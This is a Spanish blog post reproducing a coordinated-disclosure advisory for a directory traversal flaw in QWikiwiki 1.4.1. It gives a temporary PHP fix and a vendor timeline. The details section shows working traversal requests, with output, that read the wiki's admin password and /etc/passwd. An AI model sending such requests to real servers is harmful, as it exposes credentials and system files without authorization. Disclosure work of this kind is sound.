Vulnerabilidad en QWikiwiki

Enero 7th, 2005

He estado investigando bastante sobre vulnerabilidades en PHP y revisando bastante código en busca de fallos de seguridad. Todas las vulnerabilidades que vaya descubriendo las ire publicando aqui, además de enviarlas a los autores del software y a las listas de seguridad (Bugtraq, SecurityFocus,…). Aqui va la primera de las vulnerabilidades.

Title: QWikiwiki directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 01/01/2005
Severity: Critical

Summary: 

QwikiWiki is driven by one core design goal: simplicity. This design goal is codified into three key principles: 

  • Self Sufficiency: QwikiWiki requires only a web server and PHP. 
  • Zero-Edit Deployment: QwikiWiki is immediately usable “out of the box”. 
  • Minimalist Featureset: QwikiWiki is not everything to everybody.

QwikiWiki uses only cookies and the file system, and thus does not require a MySQL server or any other database support. Data is stored in simple text files, and backups are just complete copies of the data directory. Ain’t nothing fancier than it need be.
(from vendor site: http://www.qwikiwiki.com)

QWikiwiki doesn’t check the page parameter which allows reading any file

This vulnerability has been tested with QWikiwiki 1.4.1

Details:

If we want to read the password for QWikiwiki:

REQUEST: http://[SERVER]/qwiki/index.php?page=../_config.php%00

RETURNS: (looking at source of HTML)

[…]
$QW_CONFIG[‘title’] = “QwikiWiki”;
$QW_CONFIG[‘adminName’] = “David Barrett”;
$QW_CONFIG[‘adminPassword’] = ‘changeme!’

We can also read any file the webserver has permission to:

REQUEST: http://[SERVER]/qwiki/index.php?page=../../../../../../etc/passwd%00

RESPONSE:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[…]

Solution:

Temporary Fix In file _wikiLib.php substitute

function QWCreateDataPath( $page, $extension ) {
return ‘data/’. $page . $extension;
}

with

function QWCreateDataPath( $page, $extension ) {
if (strpos($page, “..”) === false) {
return ‘data/’. $page . $extension;
} else {
return ”;
} }

Timeline: 

01/01/2005 – Vulnerability found
01/01/2005 – Vendor contacted
01/01/2005 – Vendor confirmed bug
04/01/2005 – Bug published in vendor page and advisory released

Guardado en Vulnerabilidades | 1 comentario »

1 comentario

  1. Anónimo dijo: